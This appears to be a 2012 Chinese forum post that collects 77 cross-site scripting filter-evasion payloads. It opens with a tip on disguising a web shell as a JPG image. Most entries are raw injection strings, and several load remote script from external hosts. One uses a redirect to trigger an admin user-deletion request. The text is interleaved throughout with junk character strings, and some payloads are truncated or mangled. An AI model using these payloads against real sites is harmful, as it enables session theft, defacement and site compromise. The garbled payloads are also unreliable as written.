跨站图片shell- T- Y# G" P+ @# a. _& V2 U5 _
XSS跨站代码 <script>alert("")</script>
4 F$ T# _8 i5 x+ M4 ?0 `
* i# y% |/ Y( V将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
' O2 W" c% y) g- ^. {" ~& l3 N5 m5 [) O( H
4 K) J4 Y+ ~9 z4 L7 @8 T: [9 g3 _) C* j8 g
1)普通的XSS JavaScript注入' g, n, S8 j' k- b: ~$ Z2 y6 ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. B% U+ u9 @& r% S' E, J+ g4 r) [( H% r4 \
(2)IMG标签XSS使用JavaScript命令2 p$ b+ t% F q% b# L* n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 n' d* N w$ G/ g) Q: V3 {! F
) M' s, T" s% {* _1 d- }2 L(3)IMG标签无分号无引号; T* ]8 N' p# t7 v* A6 K
<IMG SRC=javascript:alert(‘XSS’)>& V7 ]; X8 v0 @" d- z8 T5 k; f
( T b% K. I8 d6 ?6 c' B(4)IMG标签大小写不敏感, M! P4 P( y% t7 \0 `
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>4 Z( w' ~7 K- M3 D. v* D% \- |
: h0 H3 t1 E; N& ~- [: o: K/ x. |; z(5)HTML编码(必须有分号)5 h) e3 r3 n& F
<IMG SRC=javascript:alert(“XSS”)>
# x; y% P7 @& N" H6 M/ E- E
0 |5 X! n3 h9 U! j, B. T& L% e(6)修正缺陷IMG标签0 E9 Y6 R/ o) Z7 g; j# E
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# O$ ~5 i6 s& F6 ?; H. S j5 h8 G0 s
(7)formCharCode标签(计算器)6 R/ k3 D+ D- Q. [7 Q* @
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
{; z2 n" ^9 x9 [9 b& Q% `8 O( N3 V. a* g3 B* \: [
(8)UTF-8的Unicode编码(计算器)2 {$ X6 f/ [' K1 P4 A
<IMG SRC=jav..省略..S')>- f, ]+ ]1 @! C1 x
2 m( ]( j. \/ F5 K4 ~# ^" r* p(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* V! \" p" x. U& ?<IMG SRC=jav..省略..S')>) u# E7 _/ n& _4 t
) q6 ]$ m/ i- G6 w) G1 Y F(10)十六进制编码也是没有分号(计算器)
# j$ y* K! P) x M9 `* t! d3 w9 c<IMG SRC=java..省略..XSS')>
+ t, S' w: B# K0 e A6 g4 f9 f' K1 d& V6 {" p2 j
(11)嵌入式标签,将Javascript分开, z, k! O( u( [2 u
<IMG SRC=”jav ascript:alert(‘XSS’);”> n( b& s5 O8 K8 \* f0 k9 j3 n
4 [( w# ?3 s# ?! G2 {; T: z(12)嵌入式编码标签,将Javascript分开
/ Q" L% L5 I# B' C<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 ?8 j4 f2 j+ P! K
# T' ?. |" r# x( f3 f(13)嵌入式换行符6 c& o. I: E# |
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ `" n" L- v/ W3 f4 r; L# X9 V% R- p/ \5 n; o$ i
(14)嵌入式回车
4 |# v; d& L, J9 J6 F<IMG SRC=”jav ascript:alert(‘XSS’);”>% u3 O$ i8 J+ X+ c$ X3 f% `( L4 \1 u
+ | Y" z7 v; b& }( y0 |6 \(15)嵌入式多行注入JavaScript,这是XSS极端的例子% x- }1 ~' S" a6 G% V/ J
<IMG SRC=”javascript:alert(‘XSS‘)”>
, {1 a* L. w! q! `- N* U0 }: g. D
. \4 h: E/ ^! e- j' ]! ~4 K6 j(16)解决限制字符(要求同页面)/ [ q# u2 T% K0 Q7 y
<script>z=’document.’</script>) X' j. K5 U5 F$ e- k3 Z
<script>z=z+’write(“‘</script>
* L+ f. f# S: `' C7 s% s4 b: R6 |<script>z=z+’<script’</script>
+ J) d" K* C! e, [) d( z' u' s<script>z=z+’ src=ht’</script>
' B# W6 [6 v6 v# i) T1 r; ]<script>z=z+’tp://ww’</script>
& T& N4 g9 a2 _2 y0 I$ O<script>z=z+’w.shell’</script>
3 v8 W, v. @3 j* k# _<script>z=z+’.net/1.’</script>
" T. @2 Z$ ?) y$ D3 {<script>z=z+’js></sc’</script>5 @/ K1 h( A" K$ s. ]& v
<script>z=z+’ript>”)’</script>( Y5 m K4 w% r, c
<script>eval_r(z)</script>( w$ e' u% X4 @, e
; v: L8 S. h8 b0 E
(17)空字符7 `; s' v( [) z$ `0 W
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' x( X; e v3 d' r# H8 V7 q/ c4 [: V6 Q8 u
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 ]% u" d+ {5 F1 i" n
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out- p# \( ]$ ^% l9 B
. J2 b/ I+ P& J% E0 w+ n ?(19)Spaces和meta前的IMG标签, S/ N, ~- N' s) ^4 Z0 F* k
<IMG SRC=” javascript:alert(‘XSS’);”>
' s' B' d ~' q9 |9 v7 K7 S. ~
" h3 h4 N7 a( s9 n. V' ]: r(20)Non-alpha-non-digit XSS
; Q% k y0 V/ X- ^" @/ {1 B% [<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, V, ~3 C$ H3 j: d" ^. Y0 {7 j% t
# }+ c/ N- H; S0 F6 x
(21)Non-alpha-non-digit XSS to 26 ?$ B1 y( D; {5 L# [
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>1 s+ l# X4 d* C' }' w
3 s0 @/ [' g/ D- v. R2 m, O9 u(22)Non-alpha-non-digit XSS to 3
% Q" q# d' p0 h1 K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- x" _6 p) J; ~6 F
. w4 g' u- f% c& n! v(23)双开括号
$ x# _ p& p2 w7 v<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 S( h' x. e/ m$ s5 ~" d/ {, Q
2 i: F, h8 p; k4 }# T3 b" j1 f(24)无结束脚本标记(仅火狐等浏览器)8 C; j- n- S1 T8 e* }* D! J
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
7 [" m; f7 @& Y; Q1 l" |% v8 e% m1 I+ a0 X8 Z, Z9 N Z* L! A/ @6 l
(25)无结束脚本标记2+ \- C: n1 d5 i1 W: F4 ]: y
<SCRIPT SRC=//3w.org/XSS/xss.js>
8 Z0 \, Q+ [' Z6 i% k6 ^7 l; j; C# c, E6 w D7 C- z
(26)半开的HTML/JavaScript XSS
$ `$ V) P$ k, l7 ^" v<IMG SRC=”javascript:alert(‘XSS’)”& r6 ]( t. n9 `
/ u$ z$ W/ e" c# q3 b(27)双开角括号 i/ Q9 ~: F8 w9 L% f
<iframe src=http://3w.org/XSS.html <7 O3 R# ~8 H3 S8 @& A% u$ i6 z: f, t ]
$ R1 T. A. f/ x2 V) a: k
(28)无单引号 双引号 分号
. r2 _! W: x" [: O, F<SCRIPT>a=/XSS/2 D# C4 T& e- q: ?9 ~) r6 _
alert(a.source)</SCRIPT>
n8 A% J( P: b! h) ~( q* V. T, c4 S4 e2 `
(29)换码过滤的JavaScript
+ g2 u6 a1 t4 `/ U\”;alert(‘XSS’);//
6 J& g/ y: R) @0 f+ D; c2 e: M! o ~8 n) a' G; q5 c* T; v& T% X
(30)结束Title标签
& u* |; Q# l' Z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT> C- i5 f# e% M$ a: F
( X+ }4 }4 j- b8 |( W7 k(31)Input Image
8 P8 d0 c' g& R" |+ h<INPUT SRC=”javascript:alert(‘XSS’);”>6 x$ A, c( A, t9 Q4 Y. W& r7 t
1 a4 P* w4 u. k8 ~1 m% y
(32)BODY Image7 R4 i; p3 s9 B* e5 K" n/ e0 R: X
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 U) z8 ? ]) ^5 I
. T P: L8 P1 T, n+ B; F(33)BODY标签
0 n+ K% j( `8 n. I& {3 X- E<BODY(‘XSS’)>
5 Y' ~/ o, U h& Z* k" g( U: M# e* U' O/ J% \3 q1 F
(34)IMG Dynsrc8 g1 k& U" @* p2 G# i0 S
<IMG DYNSRC=”javascript:alert(‘XSS’)”>7 b0 T. l6 B0 ]0 P) M: n
. B- v. E( F. J: e7 [. }(35)IMG Lowsrc
3 d. n, E& X' u' v+ t1 S9 Z5 W<IMG LOWSRC=”javascript:alert(‘XSS’)”>- n+ J# v6 w* k3 {) X
1 u: H7 v5 `! W% K- U4 U. ?6 v(36)BGSOUND
! m# Z$ U6 I9 v$ f, m<BGSOUND SRC=”javascript:alert(‘XSS’);”>/ K$ J$ q, b% l4 l
( S* C6 V$ k$ {4 x
(37)STYLE sheet
9 a7 T; \$ ]# m<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 A) Y: q c* y5 W( s( U% b o" j i7 p5 F
(38)远程样式表
& I$ Z. z# o7 v<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> x. v6 u& b" F$ C3 |- e
8 u/ ~0 A1 _% N- y5 |" C/ y
(39)List-style-image(列表式)
, a m( D V! o7 J, s<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( B# O v9 H5 P! o# e( U
" d/ Y- ^* S0 ^(40)IMG VBscript6 l/ {) D7 i7 j
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 z4 J/ O1 w6 k% m% g! S8 r' K) |5 S q s$ \9 m, ^
(41)META链接url" V6 u6 ~! J/ ]' h& E- `, k6 I. `
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>9 E- e# f$ p, \8 T' f* c6 Z; J v
2 [& P/ k4 G& v
(42)Iframe
) n0 \+ \1 P2 g( J<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
* V# O6 ~4 v/ G/ _2 z(43)Frame
3 ~, l, I6 f$ q<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
) @* d9 I8 Z' E8 N4 V$ k- P" i
1 ?+ e9 l$ }' I8 J0 t4 Q(44)Table
8 w: f) d+ h0 N, F, u& F<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! |) t9 H) ^. {, o2 I, [
6 y- `+ p) u0 q G o(45)TD
1 a3 L; K- E3 x8 V. a<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* d/ g1 e1 C! H/ z
/ w9 f* M4 {, E, C4 w
(46)DIV background-image
/ R, D" `: l( E: ?1 u, Y# k" r+ X. K<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ d/ S/ v) ^; |& \! i6 C$ }0 W& x
; W0 E- J; M w" |9 p$ Y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279): f4 j' @9 n& v! `! R" o% U% l* i
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
a. `# ^4 X2 o$ c I1 b; S. j
$ b7 [" Z A" \: i/ D7 o" h(48)DIV expression
7 F2 P2 G& B" d3 o% U: M4 S% |) i7 ?<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
8 X7 Z, T; @4 V$ \3 z3 C$ o' e8 y+ Z; Y" ^! m$ K
(49)STYLE属性分拆表达
u6 z( J+ m) x( F<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 E' X0 v* p' G' {4 B, E
5 ^- K1 f. P8 @(50)匿名STYLE(组成:开角号和一个字母开头)
7 d: m5 T; p$ D7 K% s<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 ~ ]+ W9 b/ o% L% g }
! {1 g( G% m' H# }
(51)STYLE background-image3 p5 k& V6 s$ W0 e0 R# N3 N8 m
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>2 ]! M% w6 P4 E+ D2 q
5 i+ K. f$ A+ A9 U
(52)IMG STYLE方式; ]8 `# J1 X0 v# B* ]
exppression(alert(“XSS”))’>) s* \$ t. e! W5 e9 x
6 E) |& V. H& f3 z
(53)STYLE background
9 _$ G0 K% Y/ }0 I<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ L: A' \8 W! g% G1 [. M4 P* G
& m% l8 J2 X2 G8 p _0 ~+ r" N
(54)BASE
; m$ _6 `# D9 c* |* c8 j<BASE HREF=”javascript:alert(‘XSS’);//”>* K* r1 _& i1 d; S/ F% \5 A7 c
! c$ Y4 y7 d3 |2 t. }(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
; f0 E6 V5 S- p1 y: @/ a! m, [<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
; }& d; w0 U+ ?& V5 {! |# W4 q9 {
(56)在flash中使用ActionScrpt可以混进你XSS的代码/ O8 G4 M7 d0 @
a=”get”;* G `: y1 S5 x
b=”URL(\”";
3 M& K1 Y) ^- O1 _0 g! tc=”javascript:”;
# {1 W* J9 q1 P6 g% hd=”alert(‘XSS’);\”)”;
) ~5 ` k& U/ b# Seval_r(a+b+c+d);
: v/ _2 [$ C& `% F5 L8 K! q- P2 j( s+ ]9 |8 D0 d
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- M; w9 B& a% ^$ D' d* Z ^6 T
<HTML xmlns:xss>9 Y* N$ G4 \9 d; j0 S, J
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
- d2 @' S, x! P9 t/ _<xss:xss>XSS</xss:xss>, D6 z2 b( S6 o7 a( `
</HTML>7 u x( [- P5 H1 g8 x( A- F
! O- Q u4 ~, ]0 v3 Y0 u* L# H- T(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ v9 a) x/ }6 N5 e" ~4 g1 @. H# \+ a
<SCRIPT SRC=””></SCRIPT>3 D* v; p( m0 y S
, ~3 X0 v, V+ f& u2 l& Q
(59)IMG嵌入式命令,可执行任意命令# w$ I Y& K! Y" {" v/ Z, a6 ]
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
: |+ H }3 ]/ [1 q2 f/ }- B# Q, v4 u+ ^# u1 v
(60)IMG嵌入式命令(a.jpg在同服务器)# B$ ~9 _1 [- H
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 A A, l: n8 |; m1 r
% U3 m& m( m6 {" K) P: D(61)绕符号过滤
& k5 y+ P+ B: I<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>: G4 j& A: @2 D/ Z# _
5 Z. u6 l" I8 W! V& ]! f(62): b- _# }' l" |
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 V# e0 ]- i" P3 T3 d* F' q0 [
6 j7 D- d* H0 N6 J0 m5 X(63)( [' N8 Y( n9 U3 Z* H
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 h. K/ i4 X3 z1 |" E! V
7 o" E4 ~, u* M1 t; J
(64)
, {5 u0 e- p* |5 N. f<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>8 N/ d0 P6 ~" f
7 y! I! g4 f) D: V& h2 g L(65)) j* V' }+ t2 e8 |3 B. z+ [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- d+ [( f, ]6 A. e& F9 h+ K
" v4 {7 K# y* P5 r% P& D(66)
: a1 L o% Q4 ]; T1 G<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>+ m7 D, d; ~2 I' {6 v5 l
: @8 j* \, C9 j g Z7 P" P, a8 a(67)+ X! A, L% W$ v4 b1 I
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
A' }2 _' \2 |
/ `, D$ u1 f8 i0 V' r( y7 t(68)URL绕行" D: M3 R. Y! c
<A HREF=”http://127.0.0.1/”>XSS</A>
+ w+ C9 n: \; L! i# J1 g+ G5 K5 L( ~
8 o$ s' o- b% n5 u6 {- J(69)URL编码5 H! M3 d/ u b0 g' N
<A HREF=”http://3w.org”>XSS</A>. }" s% @* @5 S
2 v5 e0 W! X; Q: W S(70)IP十进制! t0 r# u7 ]- x! B" p, B* G2 x
<A HREF=”http://3232235521″>XSS</A>( [" R }0 L4 O3 K; E( o" h
7 J. z* k0 I* F' L7 M. J$ h5 e(71)IP十六进制
' t# X; t. O# z<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># \; [1 q. H1 A. l! V" U0 I1 `
, a- H @# @' t U2 I$ P+ E6 Z+ q7 U
(72)IP八进制
5 K: I$ p/ F4 u<A HREF=”http://0300.0250.0000.0001″>XSS</A>" m( u- x* V7 t" D9 f5 B, ~7 X$ Y
2 R/ b p/ y& t. O0 h1 g x(73)混合编码% b- K" A$ R: w* Q6 P Z) F( l
<A HREF=”h
* b' k q) a" C: }tt p://6 6.000146.0×7.147/”">XSS</A>
' V" A Y4 G& B( |5 J4 v( _4 b/ }, ~# _, f
(74)节省[http:]
* Z' ?4 [2 c3 \5 y$ q4 E8 J. j<A HREF=”//www.google.com/”>XSS</A>
2 K4 Z/ b" h0 S9 Y
R8 n1 Y$ p! ?' H; D6 y/ [(75)节省[www]
, Y Q) a& {+ ?. G/ C<A HREF=”http://google.com/”>XSS</A>
3 D5 o1 ^5 n0 Y- J$ O2 b- E
8 F4 _& v: _, ]# c, z' c(76)绝对点绝对DNS4 t3 P/ Q: ] E6 x- {* Q1 M6 n5 ]1 E
<A HREF=”http://www.google.com./”>XSS</A>
0 v9 ]9 O) `, x) \. V- A8 I, e+ s- t2 t" ~4 U: ?, G
(77)javascript链接 |0 w' n" o/ M# K0 [
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>' D# A1 A/ o6 G9 O. d
|
发表于 2012-9-13 17:04:56
收藏
支持
反对